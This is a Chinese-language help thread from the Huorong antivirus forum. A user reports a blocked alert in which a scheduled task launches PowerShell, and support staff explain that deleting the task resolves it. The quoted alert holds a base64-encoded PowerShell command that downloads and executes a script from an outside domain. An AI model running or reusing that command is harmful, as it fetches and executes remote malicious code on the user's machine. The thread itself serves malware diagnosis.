火绒安全软件

标题: [求助]svchost.exe触犯敏感动作防护规则 [打印本页]

作者: 英梨梨厨 时间: 2019-12-22 01:04
标题: [求助]svchost.exe触犯敏感动作防护规则
操作进程：C:\WINDOWS\system32\svchost.exe
命令行：C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
父进程：C:\WINDOWS\system32\services.exe
防护项目：利用PowerShell执行可疑脚本
执行文件：C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGEAZABkAHIAZQBzAHMAbgBlAHQALgBkAG8ALgBhAG0ALwBlAGMALgB0AHgAdAAnACkAKQA=
操作结果：已阻止

基本一两个小时就会触发一次。但是全盘杀毒后无发现。看到论坛有类似的帖子说是挖矿病毒，要关闭远程端口。但我希望能找到病毒的文件，否则天天看到火绒有个红点提示也很烦。联系QQ：④18665127

作者: 火绒运营专员 时间: 2019-12-22 10:17
您好，已经添加您QQ啦，请您注意查收~

作者: 火绒运营专员 时间: 2019-12-23 10:35
您好，您所遇到的问题工程师已经远程帮您解决，感谢反馈哦~

作者: baifengs 时间: 2019-12-26 23:28
好像很危险的样子啊。具体什么情况，怎么处理的。

作者: 火绒运营专员 时间: 2019-12-27 16:12

baifengs 发表于 2019-12-26 23:28
好像很危险的样子啊。具体什么情况，怎么处理的。

您好，经远程查看，电脑存在计划任务，启动powershell脚本，火绒已拦截，删除该计划任务即可，您后期在使用火绒的过程中遇到问题，欢迎您联系我们，感谢您的反馈~

欢迎光临火绒安全软件 (https://bbs.huorong.cn/)